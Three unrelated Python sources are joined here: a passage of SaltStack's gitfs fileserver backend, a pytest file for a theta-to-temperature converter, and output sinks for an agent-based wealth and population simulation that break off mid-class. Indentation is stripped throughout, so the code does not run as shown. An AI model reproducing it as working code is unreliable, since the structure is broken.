'Cache path {0} (corresponding remote: {1}) '
'exists but is not a valid git repository. You '
'will need to manually delete this directory on '
'the master to continue to use this gitfs remote.'
.format(rp_, opt)
)
continue
elif provider == 'pygit2':
if not os.listdir(rp_):
repo = pygit2.init_repository(rp_)
else:
try:
repo = pygit2.Repository(rp_)
except KeyError:
log.error(
'Cache path {0} (corresponding remote: {1}) '
'exists but is not a valid git repository. You '
'will need to manually delete this directory on '
'the master to continue to use this gitfs remote.'
.format(rp_, opt)
)
continue
else:
raise SaltException(
'Invalid gitfs_provider {0!r}. Valid choices are: {1}'
.format(provider, VALID_PROVIDERS)
)
except Exception as exc:
msg = ('Exception caught while initializing the repo for gitfs: '
'{0}.'.format(exc))
if provider == 'gitpython':
msg += ' Perhaps git is not available.'
log.error(msg)
return repos
if not repo.remotes:
try:
repo.create_remote('origin', opt)
# ignore git ssl verification if requested
ssl_verify = 'true' if __opts__.get('gitfs_ssl_verify', True) \
else 'false'
if provider == 'gitpython':
repo.git.config('http.sslVerify', ssl_verify)
elif provider == 'pygit2':
repo.config.set_multivar('http.sslVerify', '', ssl_verify)
except os.error:
# This exception occurs when two processes are trying to write
# to the git config at once, go ahead and pass over it since
# this is the only write
# This should place a lock down
pass
if repo.remotes:
repos.append(repo)
return repos
def purge_cache():
bp_ = os.path.join(__opts__['cachedir'], 'gitfs')
try:
remove_dirs = os.listdir(bp_)
except OSError:
remove_dirs = []
for _, opt in enumerate(__opts__['gitfs_remotes']):
repo_hash = hashlib.md5(opt).hexdigest()
try:
remove_dirs.remove(repo_hash)
except ValueError:
pass
remove_dirs = [os.path.join(bp_, r) for r in remove_dirs
if r not in ('hash', 'refs', 'envs.p')]
if remove_dirs:
for r in remove_dirs:
shutil.rmtree(r)
return True
return False
def update():
'''
Execute a git pull on all of the repos
'''
# data for the fileserver event
data = {'changed': False,
'backend': 'gitfs'}
provider = _get_provider()
pid = os.getpid()
data['changed'] = purge_cache()
repos = init()
for repo in repos:
origin = repo.remotes[0]
if provider == 'gitpython':
working_dir = repo.working_dir
elif provider == 'pygit2':
working_dir = repo.workdir
lk_fn = os.path.join(working_dir, 'update.lk')
with salt.utils.fopen(lk_fn, 'w+') as fp_:
fp_.write(str(pid))
try:
if provider == 'gitpython':
for fetch in origin.fetch():
if fetch.old_commit is not None:
data['changed'] = True
elif provider == 'pygit2':
fetch = origin.fetch()
if fetch.get('received_objects', 0):
data['changed'] = True
except Exception as exc:
log.warning(
'Exception caught while fetching: {0}'.format(exc)
)
try:
os.remove(lk_fn)
except (IOError, OSError):
pass
env_cache = os.path.join(__opts__['cachedir'], 'gitfs/envs.p')
if data.get('changed', False) is True or not os.path.isfile(env_cache):
new_envs = envs(ignore_cache=True)
serial = salt.payload.Serial(__opts__)
with salt.utils.fopen(env_cache, 'w+') as fp_:
fp_.write(serial.dumps(new_envs))
log.trace('Wrote env cache data to {0}'.format(env_cache))
# if there is a change, fire an event
if __opts__.get('fileserver_events', False):
event = salt.utils.event.MasterEvent(__opts__['sock_dir'])
event.fire_event(data, tagify(['gitfs', 'update'], prefix='fileserver'))
try:
salt.fileserver.reap_fileserver_cache_dir(
os.path.join(__opts__['cachedir'], 'gitfs/hash'),
find_file
)
except (IOError, OSError):
# Hash file won't exist if no files have yet been served up
pass
def envs(ignore_cache=False):
'''
Return a list of refs that can be used as environments
'''
if not ignore_cache:
env_cache = os.path.join(__opts__['cachedir'], 'gitfs/envs.p')
cache_match = salt.fileserver.check_env_cache(__opts__, env_cache)
if cache_match is not None:
return cache_match
base_branch = __opts__['gitfs_base']
provider = _get_provider()
ret = set()
repos = init()
for repo in repos:
if provider == 'gitpython':
ret.update(_envs_gitpython(repo, base_branch))
elif provider == 'pygit2':
ret.update(_envs_pygit2(repo, base_branch))
else:
raise SaltException(
'Invalid gitfs_provider {0!r}. Valid choices are: {1}'
.format(provider, VALID_PROVIDERS)
)
return sorted(ret)
def _envs_gitpython(repo, base_branch):
'''
Check the refs and return a list of the ones which can be used as salt
environments.
'''
ret = set()
remote = repo.remotes[0]
for ref in repo.refs:
parted = ref.name.partition('/')
short = parted[2] if parted[2] else parted[0]
if isinstance(ref, git.Head):
if short == base_branch:
short = 'base'
if ref not in remote.stale_refs:
ret.add(short)
elif isinstance(ref, git.Tag):
ret.add(short)
return ret
def _envs_pygit2(repo, base_branch):
'''
Check the refs and return a list of the ones which can be used as salt
environments.
'''
ret = set()
remote = repo.remotes[0]
stale_refs = _stale_refs_pygit2(repo)
for ref in repo.listall_references():
ref = re.sub('^refs/', '', ref)
rtype, rspec = ref.split('/', 1)
if rtype == 'tags':
ret.add(rspec)
elif rtype == 'remotes':
if rspec not in stale_refs:
parted = rspec.partition('/')
short = parted[2] if parted[2] else parted[0]
if short == base_branch:
short = 'base'
ret.add(short)
return ret
def find_file(path, short='base', **kwargs):
'''
Find the first file to match the path and ref, read the file out of git
and send the path to the newly cached file
'''
fnd = {'path': '',
'rel': ''}
base_branch = __opts__['gitfs_base']
provider = _get_provider()
if os.path.isabs(path):
return fnd
local_path = path
if __opts__['gitfs_root']:
path = os.path.join(__opts__['gitfs_root'], local_path)
if short == 'base':
short = base_branch
dest = os.path.join(__opts__['cachedir'], 'gitfs/refs', short, path)
hashes_glob = os.path.join(__opts__['cachedir'],
'gitfs/hash',
short,
'{0}.hash.*'.format(path))
blobshadest = os.path.join(__opts__['cachedir'],
'gitfs/hash',
short,
'{0}.hash.blob_sha1'.format(path))
lk_fn = os.path.join(__opts__['cachedir'],
'gitfs/hash',
short,
'{0}.lk'.format(path))
destdir = os.path.dirname(dest)
hashdir = os.path.dirname(blobshadest)
if not os.path.isdir(destdir):
os.makedirs(destdir)
if not os.path.isdir(hashdir):
os.makedirs(hashdir)
repos = init()
if 'index' in kwargs:
try:
repos = [repos[int(kwargs['index'])]]
except IndexError:
# Invalid index param
return fnd
except ValueError:
# Invalid index option
return fnd
for repo in repos:
if provider == 'gitpython':
ref = _get_ref_gitpython(repo, short)
if not ref:
# Branch or tag not found in repo, try the next
continue
tree = ref.commit.tree
try:
blob = tree / path
except KeyError:
continue
blob_hexsha = blob.hexsha
elif provider == 'pygit2':
ref = _get_ref_pygit2(repo, short)
if not ref:
# Branch or tag not found in repo, try the next
continue
tree = ref.get_object().tree
try:
blob = repo[tree[path].oid]
except KeyError:
continue
blob_hexsha = blob.hex
_wait_lock(lk_fn, dest)
if os.path.isfile(blobshadest) and os.path.isfile(dest):
with salt.utils.fopen(blobshadest, 'r') as fp_:
sha = fp_.read()
if sha == blob_hexsha:
fnd['rel'] = local_path
fnd['path'] = dest
return fnd
with salt.utils.fopen(lk_fn, 'w+') as fp_:
fp_.write('')
for filename in glob.glob(hashes_glob):
try:
os.remove(filename)
except Exception:
pass
with salt.utils.fopen(dest, 'w+') as fp_:
if provider == 'gitpython':
blob.stream_data(fp_)
elif provider == 'pygit2':
fp_.write(blob.data)
with salt.utils.fopen(blobshadest, 'w+') as fp_:
fp_.write(blob_hexsha)
try:
os.remove(lk_fn)
except (OSError, IOError):
pass
fnd['rel'] = local_path
fnd['path'] = dest
return fnd
return fnd
def serve_file(load, fnd):
'''
Return a chunk from a file based on the data received
'''
if 'env' in load:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
load['saltenv'] = load.pop('env')
ret = {'data': '',
'dest': ''}
if 'path' not in load or 'loc' not in load or 'saltenv' not in load:
return ret
if not fnd['path']:
return ret
ret['dest'] = fnd['rel']
gzip = load.get('gzip', None)
with salt.utils.fopen(fnd['path'], 'rb') as fp_:
fp_.seek(load['loc'])
data = fp_.read(__opts__['file_buffer_size'])
if gzip and data:
data = salt.utils.gzip_util.compress(data, gzip)
ret['gzip'] = gzip
ret['data'] = data
return ret
def file_hash(load, fnd):
'''
Return a file hash, the hash type is set in the master config file
'''
if 'env' in load:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
load['saltenv'] = load.pop('env')
if 'path' not in load or 'saltenv' not in load:
return ''
ret = {'hash_type': __opts__['hash_type']}
short = load['saltenv']
base_branch = __opts__['gitfs_base']
if short == 'base':
short = base_branch
relpath = fnd['rel']
path = fnd['path']
if __opts__['gitfs_root']:
relpath = os.path.join(__opts__['gitfs_root'], relpath)
path = os.path.join(__opts__['gitfs_root'], path)
hashdest = os.path.join(__opts__['cachedir'],
'gitfs/hash',
short,
'{0}.hash.{1}'.format(relpath,
__opts__['hash_type']))
if not os.path.isfile(hashdest):
with salt.utils.fopen(path, 'rb') as fp_:
ret['hsum'] = getattr(hashlib, __opts__['hash_type'])(
fp_.read()).hexdigest()
with salt.utils.fopen(hashdest, 'w+') as fp_:
fp_.write(ret['hsum'])
return ret
else:
with salt.utils.fopen(hashdest, 'rb') as fp_:
ret['hsum'] = fp_.read()
return ret
def _file_lists(load, form):
'''
Return a dict containing the file lists for files, dirs, emtydirs and symlinks
'''
if 'env' in load:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
load['saltenv'] = load.pop('env')
list_cachedir = os.path.join(__opts__['cachedir'], 'file_lists/gitfs')
if not os.path.isdir(list_cachedir):
try:
os.makedirs(list_cachedir)
except os.error:
log.critical('Unable to make cachedir {0}'.format(list_cachedir))
return []
list_cache = os.path.join(list_cachedir, '{0}.p'.format(load['saltenv']))
w_lock = os.path.join(list_cachedir, '.{0}.w'.format(load['saltenv']))
cache_match, refresh_cache, save_cache = \
salt.fileserver.check_file_list_cache(
__opts__, form, list_cache, w_lock
)
if cache_match is not None:
return cache_match
if refresh_cache:
ret = {'links': []}
ret['files'] = _get_file_list(load)
ret['dirs'] = _get_dir_list(load)
ret['empty_dirs'] = _get_file_list_emptydirs(load)
if save_cache:
salt.fileserver.write_file_list_cache(
__opts__, ret, list_cache, w_lock
)
return ret.get(form, [])
# Shouldn't get here, but if we do, this prevents a TypeError
return []
def file_list(load):
'''
Return a list of all files on the file server in a specified
environment
'''
return _file_lists(load, 'files')
def _get_file_list(load):
'''
Return a list of all files on the file server in a specified
environment
'''
if 'env' in load:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
load['saltenv'] = load.pop('env')
base_branch = __opts__['gitfs_base']
gitfs_root = __opts__['gitfs_root']
provider = _get_provider()
if 'saltenv' not in load:
return []
if load['saltenv'] == 'base':
load['saltenv'] = base_branch
repos = init()
ret = set()
for repo in repos:
if provider == 'gitpython':
ret.update(
_file_list_gitpython(repo, load['saltenv'], gitfs_root)
)
elif provider == 'pygit2':
ret.update(
_file_list_pygit2(repo, load['saltenv'], gitfs_root)
)
return sorted(ret)
def _file_list_gitpython(repo, ref_tgt, gitfs_root):
'''
Get file list using GitPython
'''
ret = set()
ref = _get_ref_gitpython(repo, ref_tgt)
if not ref:
return ret
tree = ref.commit.tree
if gitfs_root:
try:
tree = tree / gitfs_root
except KeyError:
return ret
for blob in tree.traverse():
if not isinstance(blob, git.Blob):
continue
if gitfs_root:
ret.add(os.path.relpath(blob.path, gitfs_root))
continue
ret.add(blob.path)
return ret
def _file_list_pygit2(repo, ref_tgt, gitfs_root):
'''
Get file list using pygit2
'''
def _traverse(tree, repo, blobs, prefix):
'''
Traverse through a pygit2 Tree object recursively, accumulating all the
blob paths within it in the "blobs" list
'''
for entry in iter(tree):
blob = repo[entry.oid]
if isinstance(blob, pygit2.Blob):
blobs.append(os.path.join(prefix, entry.name))
elif isinstance(blob, pygit2.Tree):
_traverse(blob, repo, blobs, os.path.join(prefix, entry.name))
ret = set()
ref = _get_ref_pygit2(repo, ref_tgt)
if not ref:
return ret
tree = ref.get_object().tree
if gitfs_root:
try:
tree = repo[tree[gitfs_root].oid]
except KeyError:
return ret
if not isinstance(tree, pygit2.Tree):
return ret
blobs = []
if len(tree):
_traverse(tree, repo, blobs, gitfs_root)
for blob in blobs:
if gitfs_root:
ret.add(os.path.relpath(blob, gitfs_root))
continue
ret.add(blob)
return ret
def file_list_emptydirs(load):
'''
Return a list of all empty directories on the master
'''
return _file_lists(load, 'empty_dirs')
def _get_file_list_emptydirs(load):
'''
Return a list of all empty directories on the master
'''
if 'env' in load:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
load['saltenv'] = load.pop('env')
base_branch = __opts__['gitfs_base']
gitfs_root = __opts__['gitfs_root']
provider = _get_provider()
if 'saltenv' not in load:
return []
if load['saltenv'] == 'base':
load['saltenv'] = base_branch
repos = init()
ret = set()
for repo in repos:
if provider == 'gitpython':
ret.update(
_file_list_emptydirs_gitpython(
repo, load['saltenv'], gitfs_root
)
)
elif provider == 'pygit2':
ret.update(
_file_list_emptydirs_pygit2(
repo, load['saltenv'], gitfs_root
)
)
return sorted(ret)
def _file_list_emptydirs_gitpython(repo, ref_tgt, gitfs_root):
'''
Get empty directories using GitPython
'''
ret = set()
ref = _get_ref_gitpython(repo, ref_tgt)
if not ref:
return ret
tree = ref.commit.tree
if gitfs_root:
try:
tree = tree / gitfs_root
except KeyError:
return ret
for blob in tree.traverse():
if not isinstance(blob, git.Tree):
continue
if not blob.blobs:
if __opts__['gitfs_root']:
ret.add(os.path.relpath(blob.path, gitfs_root))
continue
ret.add(blob.path)
return ret
def _file_list_emptydirs_pygit2(repo, ref_tgt, gitfs_root):
'''
Get empty directories using pygit2
'''
def _traverse(tree, repo, blobs, prefix):
'''
Traverse through a pygit2 Tree object recursively, accumulating all the
empty directories within it in the "blobs" list
'''
for entry in iter(tree):
blob = repo[entry.oid]
if not isinstance(blob, pygit2.Tree):
continue
if not len(blob):
blobs.append(os.path.join(prefix, entry.name))
else:
_traverse(blob, repo, blobs, os.path.join(prefix, entry.name))
ret = set()
ref = _get_ref_pygit2(repo, ref_tgt)
if not ref:
return ret
tree = ref.get_object().tree
if gitfs_root:
try:
tree = repo[tree[gitfs_root].oid]
except KeyError:
return ret
if not isinstance(tree, pygit2.Tree):
return ret
blobs = []
if len(tree):
_traverse(tree, repo, blobs, gitfs_root)
for blob in blobs:
if gitfs_root:
ret.add(os.path.relpath(blob, gitfs_root))
continue
ret.add(blob)
return sorted(ret)
def dir_list(load):
'''
Return a list of all directories on the master
'''
return _file_lists(load, 'dirs')
def _get_dir_list(load):
'''
Get a list of all directories on the master
'''
if 'env' in load:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
load['saltenv'] = load.pop('env')
base_branch = __opts__['gitfs_base']
gitfs_root = __opts__['gitfs_root']
provider = _get_provider()
if 'saltenv' not in load:
return []
if load['saltenv'] == 'base':
load['saltenv'] = base_branch
repos = init()
ret = set()
for repo in repos:
if provider == 'gitpython':
ret.update(_dir_list_gitpython(repo, load['saltenv'], gitfs_root))
elif provider == 'pygit2':
ret.update(_dir_list_pygit2(repo, load['saltenv'], gitfs_root))
return sorted(ret)
def _dir_list_gitpython(repo, ref_tgt, gitfs_root):
'''
Get list of directories using GitPython
'''
ret = set()
ref = _get_ref_gitpython(repo, ref_tgt)
if not ref:
return ret
tree = ref.commit.tree
if gitfs_root:
try:
tree = tree / gitfs_root
except KeyError:
return ret
for blob in tree.traverse():
if not isinstance(blob, git.Tree):
continue
if gitfs_root:
ret.add(os.path.relpath(blob.path, gitfs_root))
continue
ret.add(blob.path)
return ret
def _dir_list_pygit2(repo, ref_tgt, gitfs_root):
'''
Get a list of directories using pygit2
'''
def _traverse(tree, repo, blobs, prefix):
'''
Traverse through a pygit2 Tree object recursively, accumulating all the
empty directories within it in the "blobs" list
'''
for entry in iter(tree):
blob = repo[entry.oid]
if not isinstance(blob, pygit2.Tree):
continue
blobs.append(os.path.join(prefix, entry.name))
if len(blob):
_traverse(blob, repo, blobs, os.path.join(prefix, entry.name))
ret = set()
ref = _get_ref_pygit2(repo, ref_tgt)
if not ref:
return ret
tree = ref.get_object().tree
if gitfs_root:
try:
tree = repo[tree[gitfs_root].oid]
except KeyError:
return ret
if not isinstance(tree, pygit2.Tree):
return ret
blobs = []
if len(tree):
_traverse(tree, repo, blobs, gitfs_root)
for blob in blobs:
if gitfs_root:
ret.add(os.path.relpath(blob, gitfs_root))
continue
ret.add(blob)
return ret
|
import numpy as np
import pytest
from numpy import testing as npt
from ifg.calculator import IfgCalculator
from ifg.units_converter import convert_theta_to_temperature
COMPLICATED_MESH = (
[3.0, 5.0],
[5.0, 10.0, 15.0],
np.array(
[
[4.909741, 8.182902],
[3.092943, 5.154905],
[2.36035732, 3.9339289],
]
),
)
@pytest.fixture(
params=[
([1.0], 2.0, np.array([[3.014607]])),
([3.0], 5.0, np.array([[4.909741]])),
([3.0, 5.0], 5.0, np.array([[4.909741, 8.182902]])),
COMPLICATED_MESH,
],
)
def mesh_example(request):
return request.param
class TestConverterFromThetaToTemperature:
def test_correct_conversion(self, mesh_example):
theta, volume, temperature = mesh_example
# GIVEN: theta and specific volume (atomic)
# WHEN: conversion to temperature occurs
# THEN: the result equals to the expected one
npt.assert_allclose(convert_theta_to_temperature(theta, volume), temperature)
@pytest.mark.skip("broken after input methods refactoring")
def test_correct_mesh_creation():
from ifg.calculator import _make_mesh
# GIVEN: theta array, volume array and corresponding temperatures
theta, volume, temperature = COMPLICATED_MESH
# WHEN: mesh is created upon these volumes and temperatures
vv, tt = _make_mesh(volume, temperature)
# THEN: volume grid is created as if w/o theta
npt.assert_allclose(
vv,
[
[5.0, 10.0, 15.0],
[5.0, 10.0, 15.0],
],
)
# THEN: temperature grid is created with respect to both volumes and thetas
npt.assert_allclose(
tt,
np.array(
[
[4.909741, 3.092943, 2.36035732],
[8.182902, 5.154905, 3.9339289],
]
),
)
@pytest.mark.skip("broken after input methods refactoring")
def test_correct_simple_mesh_creation():
from ifg.calculator import _make_mesh
# GIVEN: simple (non-theta) volumes and temperatures
volumes = [1.0, 2.0]
temperatures = [10.0, 20.0, 30.0]
# WHEN: mesh grid is created
vv, tt = _make_mesh(volumes, temperatures)
# THEN: correct simple mesh is created
npt.assert_allclose(vv, [[1.0, 2.0], [1.0, 2.0], [1.0, 2.0]])
npt.assert_allclose(tt, [[10.0, 10.0], [20.0, 20.0], [30.0, 30.0]])
@pytest.mark.skip("broken after with_ removal")
def test_cannot_input_theta_before_volume():
# GIVEN: freshly created IfgCalculator()
# WHEN: `with_theta` is called before volume input
# THEN: exception is raised
with pytest.raises(ValueError) as e:
IfgCalculator().with_theta([1.0, 2.0])
assert e.match(
"specific volume should be defined before using theta for temperature input"
)
|
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import os
class Sink:
def write(self, key, obj):
raise Exception('Virtual function is not overriden')
def flush(self):
raise Exception('Virtual function is not overriden')
class CompositeSink(Sink):
def __init__(self, sinks):
self._sinks = sinks
def write(self, key, obj):
for sink in self._sinks:
sink.write(key, obj)
def flush(self):
for sink in self._sinks:
sink.flush()
class HDFSink(Sink):
def __init__(self, ctx, file_path):
self._file_path = file_path
self._data = {}
self._logger = ctx.logger
def write(self, name, df, reset_index=True):
self._data[name] = df.reset_index() if reset_index else df
def flush(self):
store = pd.HDFStore(self._file_path, complib='blosc', complevel=9)
for name, data in self._data.items():
self._logger.info("saving dataset to hdf store '%s'", name)
store[name] = data
store.close()
self._data = {}
class CommonSink(Sink):
"""
The most general sink.
"""
def __init__(self, ctx, store):
self._ctx = ctx #model context
self._store = store
n_tick = int(ctx.ctrl.ticks)
self.n_agent = np.zeros(n_tick, int)
self.mean_age = np.zeros(n_tick)
self.n_female = np.zeros(n_tick, int)
self.skill_dist = np.zeros((5, n_tick), int)
self.mean_wealth = np.zeros(n_tick)
self.n_partnered = np.zeros(n_tick, int)
self.n_coupling = np.zeros(n_tick, int)
self.n_uncoupling = np.zeros(n_tick, int)
self.skill_dist_new = np.zeros((5, n_tick), int)
self.mean_savings = np.zeros(n_tick)
self.mean_interest = np.zeros(n_tick)
self.n_dying = np.zeros(n_tick, int)
self.mean_age_dying = np.zeros(n_tick)
self.n_baby = np.zeros(n_tick, int)
self.mean_age_mother = np.zeros(n_tick)
self.gini = np.zeros(n_tick)
self.gini_adult = np.zeros(n_tick)
self.gini_20_39 = np.zeros(n_tick)
self.gini_40_64 = np.zeros(n_tick)
self.gini_65p = np.zeros(n_tick)
self.direct_amount = np.zeros(n_tick)
self.n_direct = np.zeros(n_tick, int)
self.trust_amount = np.zeros(n_tick)
self.n_from_trust = np.zeros(n_tick, int)
self.max_age = 150
self.n_agent_by_age = np.zeros((n_tick, self.max_age), int)
self.n_female_by_age = np.zeros((n_tick, self.max_age), int)
self.mean_wealth_by_age = np.zeros((n_tick, self.max_age))
self.n_partnered_by_age = np.zeros((n_tick, self.max_age), int)
self.n_coupling_by_age = np.zeros((n_tick, self.max_age), int)
self.n_uncoupling_by_age = np.zeros((n_tick, self.max_age), int)
self.n_dying_by_age = np.zeros((n_tick, self.max_age), int)
self.n_baby_by_age = np.zeros((n_tick, self.max_age), int)
self.mean_savings_by_age = np.zeros((n_tick, self.max_age))
self.mean_interest_by_age = np.zeros((n_tick, self.max_age))
self.mean_children_by_age = np.zeros((n_tick, self.max_age))
self.n_female_0_children = np.zeros((n_tick, self.max_age), int)
self.n_female_1_children = np.zeros((n_tick, self.max_age), int)
self.n_female_2_children = np.zeros((n_tick, self.max_age), int)
self.n_female_3p_children = np.zeros((n_tick, self.max_age), int)
self.direct_amount_by_age = np.zeros((n_tick, self.max_age))
self.n_direct_by_age = np.zeros((n_tick, self.max_age), int)
self.trust_amount_by_age = np.zeros((n_tick, self.max_age))
self.n_from_trust_by_age = np.zeros((n_tick, self.max_age), int)
self.tree = None
def write(self, tick, obj):
(age, female, skill, wealth, partner, coupling, uncoupling, parents,
savings, interest, dying, have_baby, boost, alive, direct_amount,
trust_amount, tree, trusts) = obj
self.n_agent[tick] = alive.sum()
self.mean_age[tick] = age[alive].mean()
self.n_female[tick] = female[alive].sum()
self.skill_dist[:, tick] = np.histogram(skill[alive], bins=list(range(6)))[0]
self.mean_wealth[tick] = wealth[alive].mean()
self.n_partnered[tick] = (partner >= 0).sum()
self.n_coupling[tick] = coupling.sum()
self.n_uncoupling[tick] = uncoupling.sum()
self.mean_savings[tick] = savings[alive].mean()
self.mean_interest[tick] = interest[alive].mean()
self.n_dying[tick] = dying.sum()
self.mean_age_dying[tick] = age[dying].mean()
self.n_baby[tick] = have_baby.sum()
self.mean_age_mother[tick] = age[have_baby].mean()
self.gini[tick] = gini(wealth[alive])
self.gini_adult[tick] = gini(wealth[alive & (age >= 20)])
self.gini_20_39[tick] = gini(wealth[alive & (age >= 20) & (age < 40)])
self.gini_40_64[tick] = gini(wealth[alive & (age >= 40) & (age < 65)])
self.gini_65p[tick] = gini(wealth[alive & age >= 65])
self.direct_amount[tick] = direct_amount.sum()
self.n_direct[tick] = (direct_amount > 0).sum()
self.trust_amount[tick] = trust_amount.sum()
self.n_from_trust[tick] = (trust_amount > 0).sum()
bins = list(range(self.max_age+1))
self.n_agent_by_age[tick, :] = np.histogram(age[alive], bins=bins)[0]
self.n_female_by_age[tick, :] = np.histogram(age[alive & female], bins=bins)[0]
self.mean_wealth_by_age[tick, :] = mean_by(wealth[alive], age[alive], 0, self.max_age)
self.n_partnered_by_age[tick, :] = np.histogram(age[partner >= 0], bins=bins)[0]
self.n_coupling_by_age[tick, :] = np.histogram(age[coupling], bins=bins)[0]
self.n_uncoupling_by_age[tick, :] = np.histogram(age[uncoupling], bins=bins)[0]
self.n_dying_by_age[tick, :] = np.histogram(age[dying], bins=bins)[0]
self.n_baby_by_age[tick, :] = np.histogram(age[have_baby], bins=bins)[0]
self.mean_savings_by_age[tick, :] = mean_by(savings[alive], age[alive], 0, self.max_age)
self.mean_interest_by_age[tick, :] = mean_by(interest[alive], age[alive], 0, self.max_age)
n_children = np.histogram(parents.ravel(), bins=list(range(len(age)+1)))[0]
self.mean_children_by_age[tick, :] = mean_by(n_children[alive], age[alive], 0, self.max_age)
self.n_female_0_children[tick, :] = np.histogram(age[alive & female & (n_children == 0)], bins=bins)[0]
self.n_female_1_children[tick, :] = np.histogram(age[alive & female & (n_children == 1)], bins=bins)[0]
self.n_female_2_children[tick, :] = np.histogram(age[alive & female & (n_children == 2)], bins=bins)[0]
self.n_female_3p_children[tick, :] = np.histogram(age[alive & female & (n_children >= 3)], bins=bins)[0]
self.direct_amount_by_age[tick, :] = sum_by(direct_amount, age, 0, self.max_age)
self.n_direct_by_age[tick, :] = np.histogram(age[direct_amount > 0], bins=bins)[0]
self.trust_amount_by_age[tick, :] = sum_by(trust_amount, age, 0, self.max_age)
self.n_from_trust_by_age[tick, :] = np.histogram(age[trust_amount > 0], bins=bins)[0]
self.tree = tree
def flush(self):
sink = self._store
ticks = pd.Series(list(range(len(self.n_agent))), name='tick')
data = pd.DataFrame({
'n_agent': self.n_agent,
'mean_age': self.mean_age,
'n_female': self.n_female,
'mean_wealth': self.mean_wealth,
'n_partnered': self.n_partnered,
'n_coupling': self.n_coupling,
'n_uncoupling': self.n_uncoupling,
'mean_savings': self.mean_savings,
'mean_interest': self.mean_interest,
'n_dying': self.n_dying,
'mean_age_dying': self.mean_age_dying,
'n_baby': self.n_baby,
'mean_age_mother': self.mean_age_mother,
'gini': self.gini,
'gini_adult': self.gini_adult,
'gini_20_39': self.gini_20_39,
'gini_40_64': self.gini_40_64,
'gini_65p': self.gini_65p,
'direct_amount': self.direct_amount,
'n_direct': self.n_direct,
'trust_amount': self.trust_amount,
'n_from_trust': self.n_from_trust,
}, index=ticks)
data = data[['n_agent', 'mean_age', 'n_female', 'mean_wealth',
'n_partnered', 'n_coupling', 'n_uncoupling', 'mean_savings',
'mean_interest', 'n_dying', 'mean_age_dying', 'n_baby',
'mean_age_mother', 'gini', 'gini_adult', 'gini_20_39',
'gini_40_64', 'gini_65p', 'direct_amount', 'n_direct',
'trust_amount', 'n_from_trust']]
sink.write('data', data)
skill_label = ['skill_{}'.format(i) for i in range(5)]
skill_dist = pd.DataFrame(self.skill_dist.T, columns=skill_label, index=ticks)
sink.write('skill_dist', skill_dist)
ticks_by_age = np.outer(ticks.values, np.ones(self.max_age, int))
age_by_age = np.outer(np.ones(len(ticks), int), np.arange(self.max_age, dtype=int))
by_age = pd.DataFrame({
'tick': ticks_by_age.ravel(),
'age': age_by_age.ravel(),
'n_agent': self.n_agent_by_age.ravel(),
'n_female': self.n_female_by_age.ravel(),
'mean_wealth': self.mean_wealth_by_age.ravel(),
'n_partnered': self.n_partnered_by_age.ravel(),
'n_coupling': self.n_coupling_by_age.ravel(),
'n_uncoupling': self.n_uncoupling_by_age.ravel(),
'n_dying': self.n_dying_by_age.ravel(),
'n_baby': self.n_baby_by_age.ravel(),
'mean_savings': self.mean_savings_by_age.ravel(),
'mean_interest': self.mean_interest_by_age.ravel(),
'mean_children': self.mean_children_by_age.ravel(),
'n_female_0_children': self.n_female_0_children.ravel(),
'n_female_1_children': self.n_female_1_children.ravel(),
'n_female_2_children': self.n_female_2_children.ravel(),
'n_female_3p_children': self.n_female_3p_children.ravel(),
'direct_amount': self.direct_amount_by_age.ravel(),
'n_direct': self.n_direct_by_age.ravel(),
'trust_amount': self.trust_amount_by_age.ravel(),
'n_from_trust': self.n_from_trust_by_age.ravel(),
})
by_age = by_age[['tick', 'age', 'n_agent', 'n_female', 'mean_wealth',
'n_partnered', 'n_coupling', 'n_uncoupling',
'n_dying', 'n_baby', 'mean_savings', 'mean_interest',
'mean_children', 'n_female_0_children',
'n_female_1_children', 'n_female_2_children',
'n_female_3p_children', 'direct_amount', 'n_direct',
'trust_amount', 'n_from_trust']]
sink.write('by_age', by_age, reset_index=False)
df_tree = pd.DataFrame({
'ancestor': np.hstack([t.row for t in self.tree]),
'descendant': np.hstack([t.col for t in self.tree]),
'generations': np.hstack([(i+1)*np.ones(len(t.row), int)
for i, t in enumerate(self.tree)])
})
df_tree = df_tree[['descendant', 'ancestor', 'generations']]
sink.write('tree', df_tree, reset_index=False)
def mean_by(values, group, min_val, max_val):
result = np.zeros(max_val - min_val) + np.nan
series = pd.Series(values).groupby(group).mean()
series = series[(series.index.values >= min_val) &
(series.index.values < max_val)]
result[series.index.values - min_val] = series.values
return result
def sum_by(values, group, min_val, max_val):
dtype = int if values.dtype == bool else values.dtype
result = np.zeros(max_val - min_val, dtype=dtype)
series = pd.Series(values).groupby(group).sum()
series = series[(series.index.values >= min_val) &
(series.index.values < max_val)]
result[series.index.values - min_val] = series.values
return result
def gini(wealth):
return 1.0 - (np.sort(wealth).cumsum() / wealth.sum()).sum() / (0.5 * len(wealth))
class IndividualSink(Sink):
def __init__(self, ctx, store):
self._ctx = ctx #model context
self._store = store
self.n_tick = int(ctx.ctrl.ticks)
self.n_agent_0 = int(ctx.ctrl.agents)
self.n_store = self.n_agent_0 * 2 # Allow for population growth
self.age = np.zeros((self.n_tick, self.n_store), int)
self.female = np.zeros((self.n_tick, self.n_store), bool)
self.skill = np.zeros((self.n_tick, self.n_store), int)
self.wealth = np.zeros((self.n_tick, self.n_store), float)
self.partner = np.zeros((self.n_tick, self.n_store), int)
self.coupling = np.zeros((self.n_tick, self.n_store), bool)
self.uncoupling = np.zeros((self.n_tick, self.n_store), bool)
self.mother = np.zeros((self.n_tick, self.n_store), int)
self.father = np.zeros((self.n_tick, self.n_store), int)
self.savings = np.zeros((self.n_tick, self.n_store), float)
self.interest = np.zeros((self.n_tick, self.n_store), float)
self.dying = np.zeros((self.n_tick, self.n_store), bool)
self.have_baby = np.zeros((self.n_tick, self.n_store), bool)
